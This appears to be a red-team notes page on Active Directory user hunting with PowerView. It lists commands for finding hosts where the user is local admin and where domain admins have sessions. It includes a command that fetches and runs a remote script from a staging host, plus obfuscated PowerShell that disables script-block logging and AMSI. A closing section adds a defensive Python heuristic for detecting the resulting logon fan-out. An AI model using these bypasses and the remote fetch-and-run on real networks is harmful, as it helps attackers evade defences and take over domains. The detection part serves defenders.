# User Hunting

## Finding local admin access

From our compromised machine, always check where we have local admin access. PowerView's command below finds all machines where our current user has local admin access.

```powershell
Find-LocalAdminAccess -Verbose
```

* The Find-WMILocalAdminAccess.ps1 and Find-PSRemotingLocalAdminAccess.ps1 PowerShell scripts can be used for the same purpose where the above does not work.

```powershell
# Dot-source the script (with its .ps1 extension) so the function is loaded into the current session
. .\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
```

## Find computers where a domain admin has session

This is the same as finding local admin access on a computer: since Server 2019, local administrator privileges are required to list sessions, so if we are able to list sessions it means we are local admin on that computer. Before using this PowerView command we must first bypass enhanced script block logging and AMSI. In the PowerShell session do the following.

```powershell
iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)
```

OR

{% code overflow="wrap" %}

```powershell
[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)  
```

{% endcode %}

Then bypass AMSI:

{% code overflow="wrap" %}

```powershell
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

{% endcode %}

Now use the PowerView function below.

```powershell
Find-DomainUserLocation -Verbose
```

## Find computers where a domain admin session is available and current user has admin access

This means a computer where a domain admin is actively interacting (accessing a share or a service) and has a session established, and where our current user also has local admin access.

```powershell
Find-DomainUserLocation -CheckAccess
```

## Find computers (File Servers and Distributed File servers) where a domain admin session is available.

```powershell
Find-DomainUserLocation -Stealth
```
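Both Find-LocalAdminAccess and Find-DomainUserLocation touch every host in the domain from a single workstation, which leaves a fan-out of network logons (Security event 4624, logon type 3) on the targets within seconds. As an added defender-side example (not from this page or from PowerView), the Python below runs that fan-out heuristic over a constructed batch of forwarded logon events; the event tuples, hostnames, window and threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of forwarded Security-log 4624 events (not real data):
# (timestamp, target host, account, logon type, source workstation)
SAMPLE_EVENTS = [
    ("2024-05-01T09:00:01", "FS01",  "j.doe", 3, "WKS07"),
    ("2024-05-01T09:00:02", "FS02",  "j.doe", 3, "WKS07"),
    ("2024-05-01T09:00:02", "SQL01", "j.doe", 3, "WKS07"),
    ("2024-05-01T09:00:03", "WEB01", "j.doe", 3, "WKS07"),
    ("2024-05-01T09:00:04", "DC01",  "j.doe", 3, "WKS07"),
    ("2024-05-01T09:00:05", "FS03",  "j.doe", 3, "WKS07"),
    ("2024-05-01T09:01:00", "FS01",  "a.lee", 3, "WKS12"),  # ordinary share use
    ("2024-05-01T09:20:00", "FS02",  "a.lee", 3, "WKS12"),  # far outside the window
    ("2024-05-01T09:00:10", "WKS07", "j.doe", 2, "WKS07"),  # interactive logon, ignored
]


def fanout_alerts(events, threshold=5, window=timedelta(minutes=2)):
    """Return {(account, source): sorted hosts} for every account/source pair
    whose network logons (type 3) reach >= threshold distinct hosts inside
    any `window`-long interval. Interactive and other logon types are skipped."""
    by_actor = defaultdict(list)
    for ts, host, user, logon_type, src in events:
        if logon_type == 3:
            by_actor[(user, src)].append((datetime.fromisoformat(ts), host))

    alerts = {}
    for actor, logons in by_actor.items():
        logons.sort()
        best = set()
        # Slide a window starting at each logon and keep the largest host set.
        for start, _ in logons:
            hosts = {h for t, h in logons if start <= t <= start + window}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= threshold:
            alerts[actor] = sorted(best)
    return alerts


if __name__ == "__main__":
    for (user, src), hosts in fanout_alerts(SAMPLE_EVENTS).items():
        print(f"{user} from {src}: {len(hosts)} hosts within 2 min -> {', '.join(hosts)}")
```

Tune the window and threshold to the environment's baseline: backup agents, monitoring accounts and admins running scripts legitimately produce the same shape and need an allow-list.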
